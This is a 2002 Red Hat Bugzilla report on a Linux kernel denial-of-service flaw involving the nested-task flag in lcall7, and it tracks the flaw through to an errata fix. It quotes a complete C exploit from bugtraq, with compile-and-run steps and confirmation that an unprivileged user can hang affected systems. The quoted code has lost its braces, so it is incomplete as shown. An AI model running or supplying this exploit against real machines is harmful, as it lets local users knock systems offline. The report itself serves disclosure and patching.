Bug 77834 - Working Dos from bugtraq mailing list
Working Dos from bugtraq mailing list
Product: Red Hat Linux
Classification: Retired
Component: kernel (Show other bugs)
i686 Linux
high Severity medium
: ---
: ---
Assigned To: Arjan van de Ven
Brian Brock
: Security
Depends On:
  Show dependency treegraph
Reported: 2002-11-14 02:42 EST by Leonid Mamtchenkov
Modified: 2007-03-26 23:58 EDT (History)
2 users (show)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Last Closed: 2002-11-16 06:06:56 EST
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---

Attachments (Terms of Use)

  None (edit)
Description Leonid Mamtchenkov 2002-11-14 02:42:49 EST
Description of Problem:
As was posted on the bugtraq[@securityfocus.com] mailing list:
From: Christophe Devine <DEVINE@iie.cnam.fr>
To: bugtraq@securityfocus.com
Date: Wed, 13 Nov 2002 00:59:09 +0000
Subject: Re: i386 Linux kernel DoS

On Wed, 13 Nov 2002, Stefan Laudat wrote:

> Regarding this issue: is it 80x86 or specifically 80386 designed ?
> Been trying it on AMD Duron, AMD Athlon MP, Intel i586 - just segfaults :(

Yep; the first version of the DoS I posted on bugtraq was defective and
worked only under special conditions (inside gdb for example).

However this updated version works much better:

#include <sys/ptrace.h>

struct user_regs_struct {
        long ebx, ecx, edx, esi, edi, ebp, eax;
        unsigned short ds, __ds, es, __es;
        unsigned short fs, __fs, gs, __gs;
        long orig_eax, eip;
        unsigned short cs, __cs;
        long eflags, esp;
        unsigned short ss, __ss;

int main( void )
    int pid;
    char dos[] = "\x9A\x00\x00\x00\x00\x07\x00";
    void (* lcall7)( void ) = (void *) dos;
    struct user_regs_struct d;

    if( ! ( pid = fork() ) )
        usleep( 1000 );
        (* lcall7)();
        ptrace( PTRACE_ATTACH, pid, 0, 0 );
        while( 1 )
            wait( 0 );
            ptrace( PTRACE_GETREGS, pid, 0, &d );
            d.eflags |= 0x4100; /* set TF and NT */
            ptrace( PTRACE_SETREGS, pid, 0, &d );
            ptrace( PTRACE_SYSCALL, pid, 0, 0 );

    return 1;

At the beginning I thought only kernels <= 2.4.18 were affected; but it
appeared that both kernels 2.4.19 and 2.4.20-rc1 are vulnerable as well.
The flaw seems to be related to the kernel's handling of the nested task
(NT) flag inside a lcall7.

Christophe Devine

This exploit compiles and works on my up2date-ed system with the latest kernel.

Version-Release number of selected component (if applicable):

How Reproducible:

Steps to Reproduce:
1. Save exploit to verybad.c
2. gcc verybad.c -o crash
3. ./crash

Actual Results:
System unresponsive, although pingable.

Expected Results:
Segmentation fault or something.

Additional Information:
Comment 1 Arjan van de Ven 2002-11-14 04:07:28 EST
yes we know about this; I built packages yesterday and they're in QA now
Comment 2 Arjan van de Ven 2002-11-16 06:06:56 EST
An errata has been issued which should help the problem described in this bug report. 
This report is therefore being closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files, please follow the link below. You may reopen 
this bug report if the solution does not work for you.

Comment 3 Frederic Hermann 2002-11-18 05:44:15 EST
This bug affect RedHat Linux 6.2 as well. I ran the program above on an up-to-
date RH6.2 box, as an unprivilegied user, and the box totally hang.

Note You need to log in before you can comment on or make changes to this bug.